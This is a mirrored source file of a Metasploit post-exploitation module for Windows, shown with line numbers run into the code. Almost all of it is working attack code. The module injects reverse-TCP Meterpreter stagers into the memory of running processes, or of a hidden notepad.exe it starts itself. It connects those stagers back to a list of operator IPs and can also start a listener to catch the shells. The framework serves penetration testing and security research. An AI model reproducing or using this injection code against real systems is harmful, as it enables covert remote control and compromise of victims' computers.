CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/windows/manage/multi_meterpreter_inject.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post67def initialize(info = {})8super(9update_info(10info,11'Name' => 'Windows Manage Inject in Memory Multiple Payloads',12'Description' => %q{13This module will inject in to several processes a given14payload and connecting to a given list of IP Addresses.15The module works with a given lists of IP Addresses and16process PIDs if no PID is given it will start a the given17process in the advanced options and inject the selected18payload in to the memory of the created module.19},20'License' => MSF_LICENSE,21'Author' => [22'Carlos Perez <carlos_perez[at]darkoperator.com>',23'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' # added multiple payload support24],25'Platform' => [ 'win' ],26'SessionTypes' => [ 'meterpreter'],27'Compat' => {28'Meterpreter' => {29'Commands' => %w[30stdapi_sys_process_attach31stdapi_sys_process_execute32stdapi_sys_process_memory_allocate33stdapi_sys_process_memory_write34stdapi_sys_process_thread_create35]36}37}38)39)4041register_options(42[43OptString.new('PAYLOAD', [false, 'Payload to inject in to process memory', 'windows/meterpreter/reverse_tcp']),44OptInt.new('LPORT', [false, 'Port number for the payload LPORT variable.', 4444]),45OptString.new('IPLIST', [true, 'List of semicolon separated IP list.', Rex::Socket.source_address('1.2.3.4')]),46OptString.new('PIDLIST', [false, 'List of semicolon separated PID list.', '']),47OptBool.new('HANDLER', [false, 'Start new exploit/multi/handler job on local box.', false]),48OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1])49]50)5152register_advanced_options(53[54OptString.new('PROCESSNAME', [false, 'Description', 'notepad.exe'])55]56)57end5859# Run Method for when run command is issued60def run61unless session.platform == 'windows' && [ARCH_X64, ARCH_X86].include?(session.arch)62print_error('This module requires native Windows meterpreter functions not compatible with the selected session')63return64end65# Set variables66multi_ip = nil67multi_pid = nil6869print_status("Running module against #{sysinfo['Computer']}")7071if datastore['HANDLER']72create_multi_handler(datastore['PAYLOAD'], datastore['LPORT'])73end7475multi_ip = datastore['IPLIST'].split(';')76multi_pid = datastore['PIDLIST'].split(';')7778datastore['AMOUNT'].times do # iterate through number of shells79multi_ip.zip(multi_pid).each do |a|80# Check if we have an IP for the session81payload = create_payload(datastore['PAYLOAD'], a[0], datastore['LPORT'])82if a[1]83inject(a[1], payload)84else85# if no PID we create a process to host the Meterpreter session86pid_num = start_proc(datastore['PROCESSNAME'])87inject(pid_num, payload)88end89select(nil, nil, nil, 5)90end91end92end9394# Function for injecting payload in to a given PID95#-------------------------------------------------------------------------------96def inject(target_pid, payload_to_inject)97print_status("Injecting meterpreter into process ID #{target_pid}")98begin99host_process = session.sys.process.open(target_pid.to_i, PROCESS_ALL_ACCESS)100raw = payload_to_inject.generate101mem = host_process.memory.allocate(raw.length + (raw.length % 1024))102103print_status("Allocated memory at address #{'0x%.8x' % mem}, for #{raw.length} byte stager")104print_status('Writing the stager into memory...')105host_process.memory.write(mem, raw)106host_process.thread.create(mem, 0)107print_good("Successfully injected Meterpreter in to process: #{target_pid}")108rescue ::Exception => e109print_error("Failed to Inject Payload to #{target_pid}!")110print_error(e.message)111end112end113114# Function for Creation of Connection Handler115#-------------------------------------------------------------------------------116def create_multi_handler(payload_to_inject, rport, rhost = '0.0.0.0')117print_status("Starting connection handler at port #{rport} for #{payload_to_inject}")118mul = client.framework.exploits.create('multi/handler')119mul.datastore['WORKSPACE'] = session.workspace120mul.datastore['PAYLOAD'] = payload_to_inject121mul.datastore['LHOST'] = rhost122mul.datastore['LPORT'] = rport123mul.datastore['EXITFUNC'] = 'process'124mul.datastore['ExitOnSession'] = false125126mul.exploit_simple(127'Payload' => mul.datastore['PAYLOAD'],128'RunAsJob' => true129)130print_good('exploit/multi/handler started!')131end132133# Function for Creating the Payload134#-------------------------------------------------------------------------------135def create_payload(payload_type, lhost, lport)136print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")137payload = payload_type138pay = client.framework.payloads.create(payload)139pay.datastore['LHOST'] = lhost140pay.datastore['LPORT'] = lport141return pay142end143144# Function starting notepad.exe process145#-------------------------------------------------------------------------------146def start_proc(proc_name)147print_good('Starting Notepad.exe to house Meterpreter Session.')148proc = client.sys.process.execute(proc_name, nil, { 'Hidden' => true })149print_good("Process created with pid #{proc.pid}")150return proc.pid151end152end153154155